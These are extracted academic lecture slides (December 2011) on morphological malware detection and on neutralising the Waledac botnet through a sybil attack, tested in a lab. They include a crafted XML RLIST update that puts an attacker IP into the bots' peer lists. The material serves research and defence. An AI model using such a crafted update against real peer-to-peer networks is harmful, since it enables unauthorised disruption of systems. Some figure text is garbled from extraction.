• Detect easily variants of the same malware family

• Try to take into account program semantics

• Quasi-automatic generation of signatures

• Cons

• Difficult to determine flow graph statically of self-modifying programs

• Use of combination of static and dynamic analysis

76mardi 20 décembre 2011

Reference

• Guillaume Bonfante, Matthieu Kaczmarek and Jean-Yves Marion, Architecture of a malware morphological detector, Journal in Computer Virology, Springer 2008.

77mardi 20 décembre 2011

Waledac, again ....

• How to neutralize a botnet ?

• Send the US-Marshals (see Rustock recent story)

• Design an attack

• Good understanding of the mechanisms of a botnet (reverse engineering)

• Find an attack

• Large scale experiments in vitro

78mardi 20 décembre 2011

Waledac Peer-to-peer communication protocol

• Each peer maintains a list of known peer (RLIST)

• Bots exchange parts of their RLIST on regular basis to maintain connectivity

• Fallback mechanism over HTT¨to fetch new peers

<lm><localtime>1244053204</localtime><nodes><node  ip="a.b.c.d"  port="80“  time="124053217">469abea004710c1ac0022489cef03183</node><node  ip="e.f.g.h"  port="80"  time="124053232“>  691775154c03424d9f12c17fdf4b640b</node>...</nodes></lm>

Global timestamp

Id Repeater 1

local timestamp

Sorted by local time

79mardi 20 décembre 2011

Waledac Peer-to-peer communication protocol

• Update are based on the most recent timestamps

• IP address does not identify a peer

• The id identifies a peer

• Vulnerability to sibyl attack

• Craft a RLIST update to put «myIP» on the top-500 list

<lm><localtime>0</localtime><nodes><node  ip="myIP"  port="80"  time="0">00000000000000000000000000000001</node>...<node  ip="myIP"  port="80"  time="0"�>00000000000000000000000000000500</node></nodes></lm>

80mardi 20 décembre 2011

Botnet neutralization in the lab

!"!#$$#%&'(!

!

)!*+,-.*!

!/011!*2#33'(*!!

011!('2'#$'(*!

4!2(5$'%$5(*!

13!

WHITE C&C!

Attack scenario!

!""#$%&%'(%$)#

81mardi 20 décembre 2011

A sybil attack

82mardi 20 décembre 2011

Spam sent by the botnet

83mardi 20 décembre 2011

Rlist infections for repeaters

84mardi 20 décembre 2011

High Security Lab @ Nancy

lhs.loria.fr

Telescope & honeypotsIn vitro experiment clusters

85mardi 20 décembre 2011

Conclusions

86mardi 20 décembre 2011

Conclusion

• Mathematical definitions of malware with tools

• High level representation of binaries

• Abstract signature which are robust w.r.t. obfuscations

• Experiments theories

• Analyzing tools combining static and dynamic analysis

• Detection and neutralization heuristics

87mardi 20 décembre 2011

Thanks !

88mardi 20 décembre 2011